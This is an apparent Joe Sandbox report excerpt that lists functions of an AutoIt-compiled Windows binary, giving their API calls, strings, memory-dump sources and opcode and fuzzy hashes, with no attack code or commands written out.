                                                                                                                                                                                                                                                                                                                            • Instruction ID: c9fa4611e0867fcd62e14b66ab801f25039d0f02f57be1a5e0a270af2309e630
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9e8ccd808627f10ee90c691dd851d386cb24a6af01febcda59bcf5cb5471d1a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3010CB26249278BCF305EBDDCA187F73B9BB60350F000524E42292290EB30D820CA50
                                                                                                                                                                                                                                                                                                                            Function 0023262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00232699
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b451f5ff71d3bf4981efd6cb2e873b9080518be78f26a9b29a2397b600b8702a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 19168e0a369503e0cb49c06730fe793a0201771348dd22b7dd26837b4f358e1c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b451f5ff71d3bf4981efd6cb2e873b9080518be78f26a9b29a2397b600b8702a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F001B5B5A24215EBCB04ABA4CC96CFE7769FF56354F50061AA433A73C1DB71581CCA50
                                                                                                                                                                                                                                                                                                                            Function 00232525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00232593
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3026b9ae6141a9b82dbd1ef817d6eca7cc310a8818517304bafe18414cb41772
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fce322415721ba29bf8c99ba5031c553d995b57630adb05b76a634348ac7ad65
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3026b9ae6141a9b82dbd1ef817d6eca7cc310a8818517304bafe18414cb41772
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C101A7B5A60105FBCF09EB90C9A6DFE77A9DF65744F90011AB803A3281DB509F1CD6B1
                                                                                                                                                                                                                                                                                                                            Function 002325A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00232615
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 067b30456387e4c5d9ac066b65e7ebfc1ee1108ccd84b8454ad1eedccb39d009
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ab4d990e3a2cee3f3964d2e14ad5e3477881e2a39e6ffd9234866b9ea49ea6c4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067b30456387e4c5d9ac066b65e7ebfc1ee1108ccd84b8454ad1eedccb39d009
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01F7B1E24205E6CF05EB90C892EFE73ACDF15744F500016B803B3281DB509E1CDAB1
                                                                                                                                                                                                                                                                                                                            Function 002326B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00232720
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e6bd88dbf2af6d3a846d6af86add231201a4809f73c31899ea65c5c3d5c107b5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 72c00dbca72ef7c1a5dc9a297461d94573329d8379edc623ac978208dd1594ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6bd88dbf2af6d3a846d6af86add231201a4809f73c31899ea65c5c3d5c107b5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F0F4B5E60214E6CB04B7A48C96FFEB3ACFF11744F400A16B423A32C1DB60681CC660
                                                                                                                                                                                                                                                                                                                            Function 00269AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00269B6D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00269B53
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 982171247-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1a9bc1c4446bfa8c5d4341388185099ea8a48a2b2c015f38a6edc853d49805f2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cd0ec919d31a5c397d3d050aee09c3279f16ee236205a8baefa0d6e8e616f894
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a9bc1c4446bfa8c5d4341388185099ea8a48a2b2c015f38a6edc853d49805f2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB01F730210214EFCB259F14FC48F563B6AFF85368F100519F9120B2F0CB7268A5DB50
                                                                                                                                                                                                                                                                                                                            Function 00203A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: 2< $j3'
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-731391251
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b1db5cfb85621b87d25a699a164024df3fe98db231a84e07e33d32def741ddbf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 48ef3b59266e1a90b783002ae591431c4a2a7c5569ba84652ea57819295b95bf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1db5cfb85621b87d25a699a164024df3fe98db231a84e07e33d32def741ddbf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32F09025624249AADB14DF91D850AF973BCDF04700F10406ABC89C72D1EAB48FA0E365
                                                                                                                                                                                                                                                                                                                            Function 00268432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00268471
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0026847F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1378638983-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dcbb967574e0f8ad42158b760326db9e1922e50ddcb440bef5d816eea8b01a85
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3323d08120093694f00ddae128ec19c20ae41de591dbb0d7f982c52cdf68d47d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbb967574e0f8ad42158b760326db9e1922e50ddcb440bef5d816eea8b01a85
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F04F31211246DFC704DF68EC48D6A77A9EB8A720B20862DFA26873F0CF709850DB10
                                                                                                                                                                                                                                                                                                                            Function 00231461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0023146F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                                            • Opcode ID: efb863ffbfa212ab4243e1d8f2b01734a455bdf764d55cee50fc0d8296f84570
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d01bf1833e47bbec2b4ec0bd3662ed3d5cd3dbf1b98ecf0b63d05c971d15c83a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb863ffbfa212ab4243e1d8f2b01734a455bdf764d55cee50fc0d8296f84570
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE0DF3279871C3AD3202794BC07F9876C98F19B61F11482AF788645C38FE264B08299
                                                                                                                                                                                                                                                                                                                            Function 001F10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001F10E2,?,?,?,001D100A), ref: 001EFAD9
                                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,001D100A), ref: 001F10E6
                                                                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001D100A), ref: 001F10F5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001F10F0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 913238f58d2b28c5974e454f97e4a312c13779aecf656ed7de33dbeef10168ef
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f39a07d28e291e16d9881804ae2c300adfd826d48cd6644d95521f81272a0312
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 913238f58d2b28c5974e454f97e4a312c13779aecf656ed7de33dbeef10168ef
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDE06570B00750DBD3209F39E948756BBE4AB14305F00C96DE98AC2692EBB4E488CBA1
                                                                                                                                                                                                                                                                                                                            Function 001EF114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001EF151
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: `5*$h5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-3640826801
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2e1aac1fc3c97d9301d47a1cd1c42a7f0565a1f603262c73cf6781803ce84c42
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5ac6d147e6d18dc929d1db9f57d8de3a17a60caab1c92912aba369aa4d95c061
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e1aac1fc3c97d9301d47a1cd1c42a7f0565a1f603262c73cf6781803ce84c42
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE02675C04D9CCBC605D72CF80999C73A0FB0E320B9C017CFA02872A29F202A43DA14
                                                                                                                                                                                                                                                                                                                            Function 002439D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002439F0
                                                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00243A05
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 705210dfa93f56c7357e7badff15cbc8211382305448552439198ec03a0b9856
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b8c57b14087eb4a61a0ae610bdbdc9df455c8f337d16e81098ce7e5fc7b32233
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 705210dfa93f56c7357e7badff15cbc8211382305448552439198ec03a0b9856
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10D05B7190031867DA209754EC0DFCB7A6CDB45710F000191BE5591091DAF0E545C7D0
                                                                                                                                                                                                                                                                                                                            Function 00262DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00262DC8
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00262DDB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
